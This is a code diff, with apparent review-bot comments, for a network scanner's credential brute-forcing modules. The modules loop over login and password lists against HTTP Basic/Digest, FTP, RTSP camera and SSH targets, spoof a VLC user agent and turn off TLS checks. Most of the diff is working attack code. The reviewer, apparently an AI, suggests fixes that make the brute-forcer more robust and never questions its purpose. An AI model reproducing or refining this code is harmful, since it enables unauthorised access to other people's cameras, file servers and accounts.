diff --git a/BasicAuth.cpp b/BasicAuth.cpp
index 7a38169..d44bfc2 100644
--- a/BasicAuth.cpp
+++ b/BasicAuth.cpp
@@ -90,6 +90,10 @@ lopaStr BA::BABrute(const char *ipOrig, const int port, bool performDoubleCheck)
int sz = con.nConnect(ipOrig, port, &buff);
+ if (Utils::ustrstr(&buff, "404 not found") != -1 || Utils::ustrstr(&buff, "404 site") != -1) {
+ return lps;
+ }
+
char ip[256] = { 0 };
if (sz == 0) {
@@ -124,6 +128,11 @@ lopaStr BA::BABrute(const char *ipOrig, const int port, bool performDoubleCheck)
}
int isDig = Utils::isDigest(&buff);
+ if (-2 == isDig) {
+ QString ipString = QString(ip);
+ stt->doEmitionFoundData("404 not found - " + ipString + "");
+ return lps;
+ }
if (isDig == -1) {
if (performDoubleCheck) {
Sleep(gTimeOut);
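Review bot: The new `-2 == isDig` branch compares against an undocumented magic return value of `Utils::isDigest`, and the trailing `+ ""` in the emitted message is a no-op. A short comment such as `// isDigest() returns -2 when the response is a 404 page` would record the contract, assuming that is what -2 means (the helper is not visible here). The message line can be reduced to `stt->doEmitionFoundData("404 not found - " + QString(ip));`. The body of BABrute continues outside this hunk.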
@@ -157,26 +166,31 @@ lopaStr BA::BABrute(const char *ipOrig, const int port, bool performDoubleCheck)
return lps;
}
+ char login[32] = { 0 };
+ char pass[32] = { 0 };
for(int i = 0; i < MaxLogin; ++i) {
+ FileUpdater::cv.wait(FileUpdater::lk, [] {return FileUpdater::ready; });
+ strcpy(login, loginLst[i]);
for (int j = 0; j < MaxPass; ++j) {
FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready;});
if (!globalScanFlag) return lps;
- lpString = string(loginLst[i]) + ":" + string(passLst[j]);
+ strcpy(pass, passLst[j]);
+
+ lpString = string(login) + ":" + string(pass);
Connector con;
res = con.nConnect(ip, port, &buffer, NULL, NULL, &lpString, digestMode);
- if (res == -2) return lps;
+ if (res == -2) {
+ rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "TIMEOUT", rowIndex);
+
+ return lps;
+ }
else if (res != -1) {
res = checkOutput(&buffer, ip, port);
if (res == -2) {
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip), "--", "404");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, "--", "404");
- }
+ rowIndex = Utils::addBARow(QString(ip), "--", "404", rowIndex);
strcpy(lps.other, "404");
return lps;
}
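Review bot: The new `strcpy(login, loginLst[i])` and `strcpy(pass, passLst[j])` copy into 32-byte stack buffers with no length check. They are safe only while every list entry stays under 32 bytes, an invariant that lives in FileUpdater.cpp's `fgets(buffFG, 32, ...)` and is not enforced here. A bounded copy removes the dependency: `snprintf(login, sizeof(login), "%s", loginLst[i]);` and `snprintf(pass, sizeof(pass), "%s", passLst[j]);`. The same pattern applies where this commit shrinks buffers that are filled by `strcpy`: `login[128]` to 32 in FTPAuth.cpp, and `login[64]`/`pass[64]` to 32 in `hikLogin` and `rviLogin` in HikvisionLogin.cpp. The later `strcpy(lps.login, login)` should be checked against the size of the `lopaStr` fields, which is not visible in this diff.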
@@ -185,42 +199,21 @@ lopaStr BA::BABrute(const char *ipOrig, const int port, bool performDoubleCheck)
break;
}
if (res == 1) {
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip), QString(loginLst[i]) + ":" + QString(passLst[j]), "OK");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(loginLst[i]) + ":" + QString(passLst[j]), "OK");
- }
+ rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK", rowIndex);
- strcpy(lps.login, loginLst[i]);
- strcpy(lps.pass, passLst[j]);
+ strcpy(lps.login, login);
+ strcpy(lps.pass, pass);
return lps;
};
}
- if (BALogSwitched) {
- if (rowIndex == -1) {
- rowIndex = nesca_3::addBARow(QString(ip),
- QString(loginLst[i]) + ":" + QString(passLst[j]),
- QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(loginLst[i]) + ":" + QString(passLst[j]),
- QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%");
- }
- }
- else { rowIndex = -1; }
+ rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%", rowIndex);
++passCounter;
Sleep(50);
}
}
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip), "--", "FAIL");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
- }
+ rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex);
return lps;
}
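Review bot: The progress-row update near the end of the inner loop no longer consults `BALogSwitched`, because the removed `if (BALogSwitched) ... else { rowIndex = -1; }` is replaced by an unconditional `Utils::addBARow(...)` call. Unless `Utils::addBARow` performs that check itself (its body is not in this diff), rows are now emitted regardless of the setting. The same replacement appears in FTPAuth.cpp, HikvisionLogin.cpp, IPCAuth.cpp and SSHAuth.cpp. A comment at the declaration stating the contract would settle this, for example `// Honours BALogSwitched; returns the row index to pass to the next call (-1 if no row exists)`. The final `rowIndex = Utils::addBARow(..., "FAIL", rowIndex);` just before `return lps;` is a dead store and can drop the assignment.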
diff --git a/Connector.cpp b/Connector.cpp
index 024c2f0..e3917a3 100644
--- a/Connector.cpp
+++ b/Connector.cpp
@@ -99,10 +99,10 @@ int my_trace(CURL *handle, curl_infotype type,
if (type == CURLINFO_HEADER_OUT) {
//data[size] = '\0';
//Activity += strlen(data);
+ data[size] = '\0';
QString qData = QString(data);
Activity += qData.length();
stt->doEmitionAddOutData(qData);
- data[0] = '\0';
}
//else if (type == CURLINFO_HEADER_IN) {
// QString qData = QString(data);
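Review bot: The added `data[size] = '\0';` writes one byte past the buffer libcurl hands to the debug callback, because that buffer is documented as exactly `size` bytes and not null-terminated. That makes this line an out-of-bounds write into memory owned by libcurl. Build the string from the explicit length instead and drop the terminator write: `QString qData = QString::fromLatin1(data, static_cast<int>(size));`. The rest of `my_trace` lies outside this hunk.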
@@ -164,6 +164,7 @@ int pConnect(const char* ip, const int port, std::string *buffer,
"Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0");
curl_easy_setopt(curl, CURLOPT_HEADER, 1L);
curl_easy_setopt(curl, CURLOPT_AUTOREFERER, 1L);
+ curl_easy_setopt(curl, CURLOPT_SSL_VERIFYSTATUS, 0L);
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback);
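Review bot: The added `CURLOPT_SSL_VERIFYSTATUS, 0L` sets libcurl's default value, so it changes no behaviour. Together with the existing `CURLOPT_SSL_VERIFYPEER` and `CURLOPT_SSL_VERIFYHOST` set to 0, every TLS response handled by `pConnect` comes from an unauthenticated peer. Any credentials supplied via `lpString` are sent to that peer as well. If this is intentional, say so once above the three options, for example `// TLS peer, host and OCSP verification are deliberately off: response contents are unauthenticated`, and drop the redundant line.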
@@ -208,7 +209,10 @@ int pConnect(const char* ip, const int port, std::string *buffer,
int sz = buffer->size();
curl_easy_cleanup(curl);
- if (res == CURLE_OK || (port == 21 && sz > 0)) {
+
+ if (res == 35) {
+ return -1;
+ } else if (res == CURLE_OK || sz > 0) {
return sz;
}
else if (res == CURLE_LOGIN_DENIED && port == 21) {
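Review bot: The new `if (res == 35)` uses a bare number where the rest of this chain uses libcurl's named codes; write `if (res == CURLE_SSL_CONNECT_ERROR) {`. Widening the success test from `port == 21 && sz > 0` to `sz > 0` means any failed transfer that delivered some bytes is now reported as success. The `CURLE_OPERATION_TIMEDOUT`/`CURLE_RECV_ERROR` handling further down (outside this hunk) is then skipped whenever the buffer is non-empty. If partial responses are meant to count, a comment such as `// a truncated response is still returned to the caller for inspection` would make that explicit.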
@@ -270,7 +274,7 @@ int pConnect(const char* ip, const int port, std::string *buffer,
return -1;
};
}
-int pConnectRTSP(const char* ip, const int port, std::string *buffer, const std::string *lpString)
+int pConnectRTSP(const char* ip, const int port, std::string *buffer, const std::string *lpString, bool isDigest)
{
buffer->clear();
int res = 0;
@@ -278,7 +282,7 @@ int pConnectRTSP(const char* ip, const int port, std::string *buffer, const std:
if (curl != NULL)
{
- //curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L);
+ curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L);
if (MapWidgetOpened) {
struct data config;
config.trace_ascii = 1; /* enable ascii tracing */
@@ -287,124 +291,41 @@ int pConnectRTSP(const char* ip, const int port, std::string *buffer, const std:
curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);
}
- char newIP[128] = {0};
- strcpy(newIP, "rtsp://");
- strncat(newIP, ip, 96);
- strcat(newIP, "/ch1/main");
- /*int y = curl_easy_setopt(curl, CURLOPT_VERBOSE, 0L);
- y = curl_easy_setopt(curl, CURLOPT_NOPROGRESS, 1L);
- y = curl_easy_setopt(curl, CURLOPT_HEADERDATA, stdout);*/
- //curl_easy_setopt(curl, CURLOPT_URL, newIP);
- //curl_easy_setopt(curl, CURLOPT_PORT, port);
- curl_easy_setopt(curl, CURLOPT_RTSP_STREAM_URI, newIP);
- //y = curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, (long)CURL_RTSPREQ_OPTIONS);
- //int y = curl_easy_setopt(curl, CURLOPT_URL, ip);
- //y = curl_easy_setopt(curl, CURLOPT_RTSP_STREAM_URI, ip);
- //curl_easy_setopt(curl, CURLOPT_PORT, port);
- /*y = curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, (long)CURL_RTSPREQ_OPTIONS);
- res = curl_easy_perform(curl);
- y = curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, (long)CURL_RTSPREQ_DESCRIBE);*/
- res = curl_easy_perform(curl);
-
- //curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, (long)CURL_RTSPREQ_DESCRIBE);
- //curl_easy_setopt(curl, CURLOPT_USERAGENT,
- // "Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0");
- //curl_easy_setopt(curl, CURLOPT_HEADER, 1L);
- //curl_easy_setopt(curl, CURLOPT_AUTOREFERER, 1L);
- //curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
- //curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
- //curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback);
- //curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer);
- //int proxyPort = std::atoi(gProxyPort);
- //if (proxyPort > 0 && proxyPort < 65535) curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort);
- //curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP);
- ////curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);
- //curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut);
- //curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3);
-
- //if (lpString != NULL) {
- // curl_easy_setopt(curl, CURLOPT_UNRESTRICTED_AUTH, 1L);
- // //curl_easy_setopt(curl, CURLOPT_FTPLISTONLY, 1L);
- // curl_easy_setopt(curl, CURLOPT_USERPWD, lpString->c_str());
- // //curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST);
- // res = curl_easy_perform(curl);
- // /*if (digestMode)
- // {
- // curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST);
- // res = curl_easy_perform(curl);
-
- // if (port != 21 && lpString != NULL) {
- // int pos = Utils::ustrstr(*buffer, "\r\n\r\n");
- // if (pos != -1) {
- // *buffer = buffer->substr(pos + 4);
- // }
- // }
- // }
- // else res = curl_easy_perform(curl);*/
- //}
- //else res = curl_easy_perform(curl);
-
- int sz = buffer->size();
-
- curl_easy_cleanup(curl);
- if (res == CURLE_OK || (port == 21 && sz > 0)) {
- if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str()));
- Activity += sz;
- return sz;
- }
- else if (res == CURLE_LOGIN_DENIED && port == 21) {
- return -1;
- }
- else if (res == CURLE_OPERATION_TIMEDOUT
- || res == CURLE_COULDNT_CONNECT
- || res == CURLE_SEND_ERROR
- || res == CURLE_RECV_ERROR
- ) {
- SOCKET eNobuffSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
- shutdown(eNobuffSocket, SD_BOTH);
- closesocket(eNobuffSocket);
- if (ENOBUFS == eNobuffSocket || ENOMEM == eNobuffSocket) {
- stt->doEmitionRedFoundData("Insufficient buffer/memory space. Sleeping for 10 sec...");
- Sleep(10000);
- }
- return -1;
+ curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, CURL_RTSPREQ_DESCRIBE);
+ curl_easy_setopt(curl, CURLOPT_USERAGENT,
+ "LibVLC/2.1.5 (LIVE555 Streaming Media v2014.05.27)");
+ curl_easy_setopt(curl, CURLOPT_URL, ip);
+ curl_easy_setopt(curl, CURLOPT_RTSP_STREAM_URI, ip);
+ curl_easy_setopt(curl, CURLOPT_HEADER, 1L);
+ curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback);
+ curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer);
+ int proxyPort = std::atoi(gProxyPort);
+ if (proxyPort > 0 && proxyPort < 65535) curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort);
+ curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP);
+ curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut);
+ curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3);
+ if (isDigest) {
+ curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST);
}
else {
- if (res == 6) return -2;
- else if (res != 13 &&
- res != 67 &&
- res != 52 &&
- res != 56 &&
- res != 35 &&
- res != 19 &&
- res != 23)
- {
- if (res == 5) {
- stt->doEmitionRedFoundData("The given proxy host could not be resolved.");
- return -2;
- }
- else if (res == 8) {
- stt->doEmitionFoundData("Strange ftp reply. (" +
- QString::number(res) + ") " + QString(ip));
- return -2;
- }
- else if (res == 18) {
- return -2;
- }
- else stt->doEmitionRedFoundData("CURL error: (" + QString::number(res) + ") " + QString(ip));
- };
+ curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_BASIC);
+ }
+ curl_easy_setopt(curl, CURLOPT_USERPWD, lpString->c_str());
+ res = curl_easy_perform(curl);
+
+ int sz = buffer->size();
+ curl_easy_cleanup(curl);
+
+ if (res == CURLE_OK || sz > 0) {
return sz;
}
-
- if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str()));
-
- return sz;
- }
- else {
- stt->doEmitionRedFoundData("Curl error.");
+
return -1;
- };
+ }
+
+ stt->doEmitionRedFoundData("Curl error.");
+ return -1;
}
void eraser(std::string *buffer, const std::string delim1, const std::string delim2) {
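Review bot: The rewritten `pConnectRTSP` calls `lpString->c_str()` unconditionally, yet `Connector::nConnect` declares `lpString = NULL` as its default and forwards it unchanged. An RTSP call without credentials therefore dereferences a null pointer. Guard it as the removed commented-out code did: `if (lpString != NULL) curl_easy_setopt(curl, CURLOPT_USERPWD, lpString->c_str());`. Separately, `CURLOPT_RTSP_REQUEST` takes a `long` through varargs, so the argument should be `(long)CURL_RTSPREQ_DESCRIBE`, as the old commented lines had it. The `CURLOPT_PROXYPORT` argument would likewise be safer as `(long)proxyPort`.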
@@ -430,14 +351,14 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer,
const std::vector *customHeaders,
const std::string *lpString,
bool digestMode,
- bool isRTSP){
+ bool isRTSP, bool isDigest){
int res = 0;
if (!isRTSP) {
res = pConnect(ip, port, buffer, postData, customHeaders, lpString, digestMode);
}
else {
- res = pConnectRTSP(ip, port, buffer, lpString);
+ res = pConnectRTSP(ip, port, buffer, lpString, isDigest);
}
cutoutComments(buffer);
@@ -447,6 +368,67 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer,
return res;
}
+int Connector::checkIsDigestRTSP(const char *ip, std::string *buffer) {
+
+ buffer->clear();
+ int res = 0;
+ CURL *curl = curl_easy_init();
+
+ if (curl != NULL)
+ {
+ curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L);
+ if (MapWidgetOpened) {
+ struct data config;
+ config.trace_ascii = 1; /* enable ascii tracing */
+ curl_easy_setopt(curl, CURLOPT_DEBUGFUNCTION, my_trace);
+ curl_easy_setopt(curl, CURLOPT_DEBUGDATA, &config);
+ curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);
+ }
+
+ curl_easy_setopt(curl, CURLOPT_RTSP_REQUEST, CURL_RTSPREQ_DESCRIBE);
+ curl_easy_setopt(curl, CURLOPT_USERAGENT,
+ "LibVLC/2.1.5 (LIVE555 Streaming Media v2014.05.27)");
+ curl_easy_setopt(curl, CURLOPT_URL, ip);
+ curl_easy_setopt(curl, CURLOPT_RTSP_STREAM_URI, ip);
+ curl_easy_setopt(curl, CURLOPT_HEADER, 1L);
+ curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback);
+ curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer);
+ int proxyPort = std::atoi(gProxyPort);
+ if (proxyPort > 0 && proxyPort < 65535) curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort);
+ curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP);
+ curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut);
+ curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3);
+
+ res = curl_easy_perform(curl);
+
+ int sz = buffer->size();
+
+ curl_easy_cleanup(curl);
+ if (res == CURLE_OK || sz > 0) {
+ if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str()));
+ Activity += sz;
+
+ if (Utils::ustrstr(buffer, "200 ok") != -1) {
+ return 2;
+ }
+ else if (Utils::ustrstr(buffer, "not found") != -1) {
+ return -1;
+ }
+ else if (Utils::ustrstr(buffer, "digest") != -1) {
+ return 1;
+ }
+ else {
+ return 0;
+ }
+ }
+
+ return -1;
+ }
+
+ stt->doEmitionRedFoundData("Curl error.");
+ return -1;
+}
+
bool portCheck(const char * sDVRIP, int wDVRPort) {
// sockaddr_in sa;
// sa.sin_family = AF_INET;
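Review bot: In `checkIsDigestRTSP`, `struct data config` is declared inside the `if (MapWidgetOpened) { ... }` block, but its address is registered with `CURLOPT_DEBUGDATA` and `curl_easy_perform` runs after that block has closed. If `my_trace` reads its user pointer, it reads a dead stack object. Declare it at function scope before the `if`, for example `struct data config; config.trace_ascii = 1;`. The context lines of `pConnectRTSP` show the same pattern. The new function also duplicates most of `pConnectRTSP`'s option setup line for line, so a shared static helper that configures the handle would keep the two from drifting. The `"200 ok"`, `"not found"` and `"digest"` return codes (2, -1, 1, 0) deserve a comment or an enum at the declaration.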
@@ -581,6 +563,9 @@ int Connector::connectToPort(char* ip, int port)
//strcpy(tempIp, "ftp://");
sprintf(tempIp, "ftp://%s:%d", ip, port);
}
+ /*else if (554 == port) {
+ sprintf(tempIp, "rtsp://%s:%d", ip, port);
+ }*/
else {
//strcpy(tempIp, "http://");
sprintf(tempIp, "http://%s:%d", ip, port);
diff --git a/Connector.h b/Connector.h
index d663440..299371f 100644
--- a/Connector.h
+++ b/Connector.h
@@ -8,7 +8,7 @@
#include
#include
#pragma comment(lib, "iphlpapi.lib")
-#pragma comment(lib,"curllib.lib")
+//#pragma comment(lib,"libcurldll.a")
#endif
#include
@@ -39,7 +39,8 @@ public:
const std::vector *customHeaders = NULL,
const std::string *lpString = NULL,
bool digestMode = false,
- bool isRTSP = false);
+ bool isRTSP = false, bool isDigest = true);
int connectToPort(char *ip, int port);
+ int checkIsDigestRTSP(const char *ip, std::string *buffer);
};
#endif // CONNECTOR_H
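Review bot: `nConnect` now has two adjacent boolean parameters with near-identical names and opposite defaults, `digestMode = false` and `isDigest = true`. A call site such as `nConnect(ip, port, &buf, NULL, NULL, &lp, true, true)` gives no hint which one selects what. From Connector.cpp, `digestMode` is forwarded to `pConnect` only and `isDigest` to `pConnectRTSP` only. Document that on the declaration, for example `// digestMode: HTTP path only; isDigest: RTSP path only (ignored unless isRTSP)`, or fold the two into one parameter. `checkIsDigestRTSP` also needs a comment listing its return values.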
diff --git a/FTPAuth.cpp b/FTPAuth.cpp
index 969f4ea..777c0d0 100644
--- a/FTPAuth.cpp
+++ b/FTPAuth.cpp
@@ -19,9 +19,8 @@ lopaStr FTPA::FTPBrute(const char *ip, const int port, PathStr *ps) {
int passCounter = 0;
int rowIndex = -1;
- char login[128] = {0};
+ char login[32] = {0};
char pass[32] = {0};
- //char nip[128] = { 0 };
for (int i = 0; i < MaxFTPLogin; ++i)
{
@@ -37,18 +36,12 @@ lopaStr FTPA::FTPBrute(const char *ip, const int port, PathStr *ps) {
strcpy(pass, ftpPassLst[j]);
if (strlen(pass) <= 1) continue;
- lpString = string(login)
- + string(pass);
+ lpString = string(login) + string(pass);
Connector con;
res = con.nConnect(ip, port, &buffer, NULL, NULL, &lpString);
if (res == -2) {
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip), "--", "FAIL");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
- }
+ rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex);
return lps;
}
else if (res != -1) {
@@ -57,39 +50,18 @@ lopaStr FTPA::FTPBrute(const char *ip, const int port, PathStr *ps) {
strcpy(lps.pass, pass);
ps->directoryCount = std::count(buffer.begin(), buffer.end(), '\n');
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), "OK");
- }
+ rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK", rowIndex);
return lps;
};
- if (BALogSwitched) {
- if (rowIndex == -1) {
- rowIndex = nesca_3::addBARow(QString(ip),
- QString(login) + ":" + QString(pass),
- QString::number((passCounter / (double)(MaxFTPPass*MaxFTPLogin)) * 100).mid(0, 4) + "%");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass),
- QString::number((passCounter / (double)(MaxFTPPass*MaxFTPLogin)) * 100).mid(0, 4) + "%");
- }
- }
- else { rowIndex = -1; }
+ rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxFTPPass*MaxFTPLogin)) * 100).mid(0, 4) + "%", rowIndex);
++passCounter;
Sleep(50);
}
}
- if (rowIndex == -1) {
- nesca_3::addBARow(QString(ip), "--", "FAIL");
- }
- else {
- stt->doEmitionChangeBARow(rowIndex, "--", "FAIL");
- }
+ rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex);
return lps;
}
diff --git a/FileUpdater.cpp b/FileUpdater.cpp
index 47dbecf..4801b49 100644
--- a/FileUpdater.cpp
+++ b/FileUpdater.cpp
@@ -55,8 +55,7 @@ void updateLogin() {
while(fgets(buffFG, 32, loginList) != NULL)
{
MaxLogin++;
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
rewind(loginList);
@@ -75,8 +74,7 @@ void updateLogin() {
if(strstr(buffFG, "\n") != NULL) strncat(loginLst[i++], buffFG, strlen(buffFG) - 1);
else strncat(loginLst[i++], buffFG, strlen(buffFG));
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
if(FileUpdater::oldLoginLstSize == 0) stt->doEmitionGreenFoundData("Login list loaded (" + QString::number(MaxLogin) + " entries)");
@@ -110,8 +108,7 @@ void updatePass() {
while(fgets(buffFG, 32, passList) != NULL)
{
MaxPass++;
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
rewind(passList);
@@ -130,8 +127,7 @@ void updatePass() {
if(strstr(buffFG, "\n") != NULL) strncat(passLst[i++], buffFG, strlen(buffFG) - 1);
else strncat(passLst[i++], buffFG, strlen(buffFG));
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
if(FileUpdater::oldPassLstSize == 0) stt->doEmitionGreenFoundData("Password list loaded (" + QString::number(MaxPass) + " entries)");
@@ -157,7 +153,6 @@ void updateSSH() {
MaxSSHPass = 0;
char buffFG[32] = {0};
- //ZeroMemory(buffFG, sizeof(buffFG));
FILE *sshlpList = fopen(SSH_PASS_FN, "r");
@@ -166,7 +161,7 @@ void updateSSH() {
while(fgets(buffFG, 32, sshlpList) != NULL)
{
++MaxSSHPass;
- //ZeroMemory(buffFG, sizeof(buffFG));
+ ZeroMemory(buffFG, sizeof(buffFG));
buffFG[0] = 0;
};
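Review bot: In `updateSSH` the new `ZeroMemory(buffFG, sizeof(buffFG));` is followed by the old `buffFG[0] = 0;`, which is now redundant and was removed in every other loop this commit touches. The IPCAuth.cpp hunk likewise leaves `request[0] = 0;` after `ZeroMemory(request, sizeof(request))`. Since other files in this diff carry `#if defined(WIN32)` branches, the tree is presumably also built off Windows, where `memset(buffFG, 0, sizeof(buffFG));` is the portable spelling unless `ZeroMemory` is defined elsewhere. The `fgets(buffFG, 32, ...)` calls in the context lines would be more robust as `fgets(buffFG, sizeof(buffFG), ...)`.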
@@ -186,8 +181,7 @@ void updateSSH() {
if(strstr(buffFG, "\n") != NULL) strncat(sshlpLst[i++], buffFG, strlen(buffFG) - 1);
else strncat(sshlpLst[i++], buffFG, strlen(buffFG));
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
if(FileUpdater::oldSSHLstSize == 0) stt->doEmitionGreenFoundData("SSH Password list loaded (" + QString::number(MaxSSHPass) + " entries)");
@@ -221,8 +215,7 @@ void updateWFLogin() {
while(fgets(buffFG, 32, wfLoginList) != NULL)
{
MaxWFLogin++;
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
rewind(wfLoginList);
@@ -241,8 +234,7 @@ void updateWFLogin() {
if(strstr(buffFG, "\n") != NULL) strncat(wfLoginLst[i++], buffFG, strlen(buffFG) - 1);
else strncat(wfLoginLst[i++], buffFG, strlen(buffFG));
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
if(FileUpdater::oldWFLoginLstSize == 0) stt->doEmitionGreenFoundData("WFLogin list loaded (" + QString::number(MaxWFLogin) + " entries)");
@@ -271,8 +263,7 @@ void updateWFPass() {
while(fgets(buffFG, 32, wfPassList) != NULL)
{
MaxWFPass++;
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
rewind(wfPassList);
@@ -291,8 +282,7 @@ void updateWFPass() {
if(strstr(buffFG, "\n") != NULL) strncat(wfPassLst[i++], buffFG, strlen(buffFG) - 1);
else strncat(wfPassLst[i++], buffFG, strlen(buffFG));
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
if(FileUpdater::oldWFPassLstSize == 0) stt->doEmitionGreenFoundData("WFPassword list loaded (" + QString::number(MaxWFPass) + " entries)");
@@ -321,8 +311,7 @@ void updateFTPLogin() {
while (fgets(buffFG, 32, ftpLoginList) != NULL)
{
MaxFTPLogin++;
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
rewind(ftpLoginList);
@@ -341,8 +330,7 @@ void updateFTPLogin() {
if (strstr(buffFG, "\n") != NULL) strncat(ftpLoginLst[i++], buffFG, strlen(buffFG) - 1);
else strncat(ftpLoginLst[i++], buffFG, strlen(buffFG));
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
if (FileUpdater::oldFTPLoginLstSize == 0) stt->doEmitionGreenFoundData("FTP login list loaded (" + QString::number(MaxFTPLogin) + " entries)");
@@ -371,8 +359,7 @@ void updateFTPPass() {
while (fgets(buffFG, 32, ftpPassList) != NULL)
{
++MaxFTPPass;
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
rewind(ftpPassList);
@@ -391,8 +378,7 @@ void updateFTPPass() {
if (strstr(buffFG, "\n") != NULL) strncat(ftpPassLst[i++], buffFG, strlen(buffFG) - 1);
else strncat(ftpPassLst[i++], buffFG, strlen(buffFG));
- //ZeroMemory(buffFG, sizeof(buffFG));
- buffFG[0] = 0;
+ ZeroMemory(buffFG, sizeof(buffFG));
};
if (FileUpdater::oldFTPPassLstSize == 0) stt->doEmitionGreenFoundData("FTP password list loaded (" + QString::number(MaxFTPPass) + " entries)");
@@ -422,7 +408,7 @@ void updateList(const char *fileName, long *szPtr, void *funcPtr(void)) {
void FileUpdater::updateLists() {
running = true;
while(globalScanFlag) {
- Sleep(600000);
+ Sleep(1000);
if(!globalScanFlag) break;
loadOnce();
}
